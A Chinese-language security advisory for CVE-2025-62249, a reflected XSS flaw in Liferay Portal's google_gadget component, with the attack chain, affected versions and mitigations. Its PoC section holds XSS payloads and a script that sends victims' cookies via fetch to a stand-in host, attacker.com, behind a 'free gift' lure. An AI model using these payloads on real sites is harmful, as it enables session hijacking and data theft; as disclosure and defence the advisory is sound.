CVE-2025-62249：Liferay Portal google_gadget 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62249

漏洞类型

反射型跨站脚本攻击（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Liferay Portal 和 Liferay DXP

漏洞概述

CVE-2025-62249 是 Liferay Portal 和 Liferay DXP 产品中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞存在于 google_gadget 组件中，允许远程未经认证的攻击者通过精心构造的恶意请求向页面注入任意 JavaScript 代码。由于该漏洞为反射型 XSS，恶意脚本会在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击或其他恶意操作。攻击者无需任何认证即可发起攻击，但需要用户交互（如点击恶意链接或访问恶意页面）才能触发漏洞利用。该漏洞影响范围广泛，涉及 Liferay Portal 7.4.0 至 7.4.3.132 版本，以及 Liferay DXP 多个季度版本（2023.Q4 至 2025.Q3）。Liferay 作为广泛应用的企业级门户平台，此次漏洞可能影响大量使用该产品的企业和组织。该漏洞由 [email protected] 报告，CVSS 3.1 评分为 6.1 分，属于中等严重等级。漏洞的影响范围被标记为 Changed（S:C），表明该漏洞可能影响超出其安全权限范围的组件，具有一定的跨组件影响能力。

技术细节

该漏洞属于典型的反射型跨站脚本（Reflected XSS）漏洞，存在于 Liferay Portal 的 google_gadget 组件中。Google Gadget 是 Liferay 平台用于集成 Google 小工具的功能模块，允许用户在门户页面中嵌入和展示来自 Google 的小工具内容。

漏洞的根本原因在于 google_gadget 组件在处理用户输入时，未对传入的参数进行充分的过滤、转义或编码处理。当攻击者构造包含恶意 JavaScript 代码的 URL 参数并发送给受害者时，服务器端将该参数原样反射回响应页面中，导致恶意脚本在受害者的浏览器上下文中执行。

利用方式如下：
1. 攻击者构造一个包含恶意 JavaScript 代码的特制 URL，该 URL 指向 Liferay Portal 的 google_gadget 端点；
2. 攻击者通过钓鱼邮件、社交工程或其他方式诱导受害者点击该恶意链接；
3. 受害者的浏览器向 Liferay 服务器发起请求，服务器将包含恶意脚本的内容返回给浏览器；
4. 由于服务器未对输出进行适当的 HTML 编码，恶意 JavaScript 代码在受害者的浏览器中执行；
5. 攻击者可以利用此漏洞窃取用户的会话 Cookie、执行未授权操作、进行钓鱼攻击或进一步渗透。

由于该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需认证（PR:N），且影响机密性和完整性，虽然需要用户交互（UI:R），但整体利用门槛较低，对使用受影响版本的企业构成中等程度的安全威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标组织使用的 Liferay Portal 或 DXP 版本，确认其是否在受影响版本范围内（7.4.0-7.4.3.132 或 DXP 2023.Q4-2025.Q3 系列版本）。

STEP 2

步骤2：构造恶意载荷

攻击者分析 google_gadget 组件的请求参数，构造包含恶意 JavaScript 代码的 URL。常见载荷包括窃取 Cookie、重定向到钓鱼页面、执行未授权操作等。

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、即时通讯、社交媒体或其他社交工程手段，将包含恶意 JavaScript 的 URL 发送给目标用户。需要用户点击链接才能触发漏洞。

STEP 4

步骤4：触发XSS执行

受害者点击恶意链接后，浏览器向 Liferay 服务器发起请求，服务器将未经过滤的用户输入反射回响应页面，恶意 JavaScript 代码在受害者浏览器上下文中执行。

STEP 5

步骤5：利用执行结果

恶意脚本执行后，攻击者可以窃取用户会话 Cookie 以冒充用户身份、修改页面内容进行钓鱼、从浏览器中提取敏感信息，或利用受害者的权限执行进一步的攻击操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Reflected XSS PoC for CVE-2025-62249 in Liferay Portal google_gadget -->
<!-- The vulnerability exists in the google_gadget component which fails to sanitize user input -->

<!-- Example malicious URL structure: -->
<!-- https://target-liferay.com/google_gadget/...?param=<script>alert(document.cookie)</script> -->

<!-- HTML PoC demonstrating the attack: -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-62249 - Liferay google_gadget XSS PoC</title>
</head>
<body>
    <h1>CVE-2025-62249 Reflected XSS PoC</h1>
    <p>Click the link below to trigger the reflected XSS vulnerability:</p>
    <!-- The malicious payload is injected via the google_gadget parameter -->
    <a href="https://target-liferay.com/web/google_gadget/view?url=javascript:alert('XSS-'+document.cookie)">
        Click here for a free gift!
    </a>
    <br><br>
    <!-- Alternative payload using img onerror -->
    <a href="https://target-liferay.com/web/google_gadget/view?url="><img src=x onerror=alert('XSS-CVE-2025-62249')></a>
    <script>
        // Automated exploitation example
        // The attacker can craft a URL that steals cookies and sends them to an attacker-controlled server
        function exploitXSS() {
            var payload = "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>";
            var maliciousURL = "https://target-liferay.com/web/google_gadget/view?url=" + encodeURIComponent(payload);
            window.location = maliciousURL;
        }
    </script>
</body>
</html>

影响范围

Liferay Portal 7.4.0 - 7.4.3.132

Liferay DXP 2025.Q3.0 - 2025.Q3.2

Liferay DXP 2025.Q2.0 - 2025.Q2.12

Liferay DXP 2025.Q1.0 - 2025.Q1.17

Liferay DXP 2024.Q4.0 - 2024.Q4.7

Liferay DXP 2024.Q3.1 - 2024.Q3.13

Liferay DXP 2024.Q2.0 - 2024.Q2.13

Liferay DXP 2024.Q1.1 - 2024.Q1.20

Liferay DXP 2023.Q4.0 - 2023.Q4.10

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）通过 Web 应用防火墙（WAF）或反向代理配置规则，过滤 google_gadget 相关端点中的可疑 JavaScript 关键字（如 <script>、onerror、onload 等）；2）在 HTTP 响应头中部署严格的内容安全策略（CSP），限制内联脚本的执行；3）将 HttpOnly 和 Secure 属性添加到会话 Cookie，防止通过 XSS 窃取会话；4）对用户进行安全意识培训，提醒员工不要点击来源不明的链接；5）监控 Web 服务器日志，检测针对 google_gadget 端点的可疑请求模式；6）考虑临时禁用 google_gadget 功能，直到完成安全补丁部署。